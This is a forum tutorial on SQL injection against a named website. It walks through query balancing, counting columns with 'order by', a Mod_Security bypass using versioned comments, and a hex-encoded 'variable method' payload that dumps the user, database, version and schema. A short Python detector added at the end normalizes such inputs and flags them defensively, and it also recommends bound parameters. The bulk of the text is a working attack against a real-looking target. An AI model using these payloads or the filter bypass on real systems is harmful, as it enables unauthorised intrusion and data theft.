Hello
Today I'm going to show you the SQLi (variable) method.
OK, let's start:
1. First we will try to balance the query.
site: http://www.unmpress.com/shell.php?Page=catalog
So we will put a backslash ( \ ) in catalog.
The site gives us an error.
pic: http://prntscr.com/8nzhm2
OK, now we try to fix this error:
http://www.unmpress.com/shell.php?Page=catalog') -- -
Done.
The query is successfully fixed.
pic: http://prntscr.com/8nzidy
OK, now we try to inject this site.
First we will find the total number of columns:
http://www.unmpress.com/shell.php?Page=catalog') order by 1 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 2 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 3 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 4 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 5 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 6 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 7 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 8 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 9 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 10 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 11 -- - [ error ]
pic: http://prntscr.com/8nziwo
So this means the total number of columns is 10.
OK, now we will find the vulnerable columns:
http://www.unmpress.com/shell.php?Page=catalog') and 0 union select 1,2,3,4,5,6,7,8,9,10 -- -
Not Acceptable!
Not Acceptable!
An appropriate representation of the requested resource could not be
found on this server. This error was generated by Mod_Security.
Pic: http://prntscr.com/8nzk9t
Don't worry, we will try to bypass it.
Done. Successfully bypassed.
site: http://www.unmpress.com/shell.php?Page=catalog') and 0 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10 -- -
pic: http://prntscr.com/8nzlb7
We found a total of 3 vulnerable columns:
columns 9, 3, 4
pic: http://prntscr.com/8nzlr6
Now try to do DIOS in any table.
I use DIOS in vulnerable column number 3:
http://www.unmpress.com/shell.php?Page=catalog')
and 0 /*!50000union*/ /*!50000select*/
1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10
-- -
But it's not working.

OK, now we will try something different. Now we will try to use the variable method.
As an example: and@x:=concat() union select 1,@x,3 -- -
and@x:= (@x is the variable)
You can use any word: @c, @b, @m, anything.
And a variable method writing example: (and) then your variable method like @x then (

and@x:=concat(database()) union select 1,@x,3 -- -
So if the vulnerable column is 2, then it shows you the database name, because you stored the database function in your variable. So you can print version, database, user, etc.
OK, now we will try it on our vulnerable site:

http://www.unmpress.com/shell.php?Page
=catalog%27%29%20%20+and@x:=concat+%280x3c62723e,0x3c62723e,0x696e6a65637465642062792072303074786630726333,0x3c62723e,0x557365723a3a3a3a,USER%28%29,0x3c62723e,0x44423a3a3a3a,DATABASE%28%29,0x3c62723e,0x56657273696f6e3a3a3a3a,VERSION%28%29,0x3c62723e,0x3c62723e,@:=0,%28select+count%28*%29/*!50000from*/information_schema.columns+where+table_schema=database%28%29+and@:=concat+%28@,0x3c6c693e,table_name,0x3a3a,column_name%29%29,@%29/*!50000UNION*/SELECT++1,2,3,@x,5,6,7,8,9,10%20--%20-
Done. We are successful.


pic: http://prntscr.com/8nznr3
And sorry for my bad English :'(
Source http://forum.sqliwiki.com/showthread.php?tid=2
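
A defender-side look at the filter gap the post relies on, as an added example that is not part of the original post: a check on the raw text misses `/*!50000union*/ /*!50000select*/`, while decoding the value and unwrapping MySQL versioned comments before matching catches it, along with the `order by` probes and the `@x:=` variable assignment. The rule names, function names and sample values are assumptions constructed for illustration, modelled on the `Page` parameter values shown above.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!NNNNN ... */ when the server version is at least
# NNNNN, so the body must be inspected as live SQL, not discarded as a comment.
VERSIONED = re.compile(r"/\*!\d{0,6}(.*?)\*/", re.S)
COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Illustrative rule set (assumed names), applied to the normalized value only.
RULES = {
    "union_select": re.compile(r"\bunion\b\s*(all\s*|distinct\s*)?\bselect\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "user_var_assign": re.compile(r"@\w*\s*:="),
}

def normalize(value: str) -> str:
    """Decode, unwrap versioned comments, drop plain comments, fold case."""
    prev = None
    while prev != value:                    # repeat to undo double encoding
        prev, value = value, unquote_plus(value)
    value = VERSIONED.sub(r" \1 ", value)   # keep the executable body
    value = COMMENT.sub(" ", value)         # ordinary comments act as spaces
    return re.sub(r"\s+", " ", value).lower().strip()

def naive_hit(value: str) -> bool:
    """Raw-text check of the kind the versioned comments slip past."""
    return bool(re.search(r"union\s+select", value, re.I))

def classify(value: str) -> list:
    """Names of the rules that fire on the normalized parameter value."""
    text = normalize(value)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed samples: Page parameter values modelled on the requests above.
SAMPLES = [
    "catalog",
    "catalog') order by 11 -- -",
    "catalog') and 0 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10 -- -",
    "catalog%27%29+and@x:=concat%28database%28%29%29/*!50000UNION*/SELECT+1,@x,3+--+-",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_hit(s)!s:5} rules={classify(s)} value={s[:44]}")
```

Matching like this is a backstop for logging and alerting; the flaw itself is closed by passing `Page` to the database as a bound parameter instead of concatenating it into the query.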